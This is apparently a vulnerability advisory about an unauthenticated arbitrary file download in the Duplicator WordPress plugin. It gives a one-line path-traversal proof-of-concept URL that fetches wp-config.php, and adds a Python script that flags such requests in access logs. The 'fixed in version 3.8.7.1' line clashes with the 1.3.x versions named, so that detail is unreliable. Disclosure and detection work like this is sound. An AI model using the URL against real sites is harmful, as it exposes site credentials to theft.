Duplicator 1.3.24 & 1.3.26 - Unauthenticated Arbitrary File Download



Description
The issue is being actively exploited and allows unauthenticated attackers to download arbitrary files from the site, such as wp-config.php.

According to the vendor, the vulnerability was present only in versions 1.3.24 and 1.3.26; it was not present in versions 1.3.22 and earlier.
Proof of Concept
http://www.example.com/wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php
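To find attempts against this endpoint in existing web server logs, here is an added detection example (not part of the advisory): it parses common-log-format lines, keeps only admin-ajax.php requests with action=duplicator_download, and flags a file parameter that traverses out of the expected directory or is absolute once URL decoding (including double encoding) is undone. The log lines are constructed for the example.

```python
import re
from typing import Dict, List
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines in common log format (not taken from any real site).
SAMPLE_LOG = """\
203.0.113.5 - - [20/Feb/2020:10:01:02 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1" 200 3120
203.0.113.5 - - [20/Feb/2020:10:01:05 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2Fwp-config.php HTTP/1.1" 200 3120
198.51.100.7 - - [20/Feb/2020:10:02:00 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=backup_archive.zip HTTP/1.1" 200 91
192.0.2.9 - - [20/Feb/2020:10:03:00 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 55
"""

# client ip, timestamp, method, request target and response status from a CLF line
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def is_traversal(value: str) -> bool:
    """True if the decoded file parameter leaves the expected directory."""
    decoded = unquote(unquote(value))  # undo single and double URL encoding
    return (
        "../" in decoded
        or "..\\" in decoded
        or decoded.startswith("/")
        or decoded.startswith("\\")
    )


def find_duplicator_download_abuse(log_text: str) -> List[Dict]:
    """Return one record per request that matches the vulnerable pattern."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if not parts.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        qs = parse_qs(parts.query)  # parse_qs already decodes one layer
        if qs.get("action", [""])[0] != "duplicator_download":
            continue
        file_param = qs.get("file", [""])[0]
        if is_traversal(file_param):
            hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                         "file": unquote(file_param), "status": int(m.group("status"))})
    return hits
```

A 200 status on a flagged request means the file was served, so those hits should be triaged first; a legitimate Duplicator download carries a plain archive name and is not flagged.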

Affects Plugins

fixed in version 3.8.7.1

References

URL https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/
URL https://snapcreek.com/duplicator/docs/changelog/?lite
URL https://snapcreek.com/duplicator/docs/changelog/

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Views 6531
Verified No
WPVDB ID 10078

Timeline

Publicly Published 2020-02-19
Added 2020-02-20
Last Updated 2020-02-29
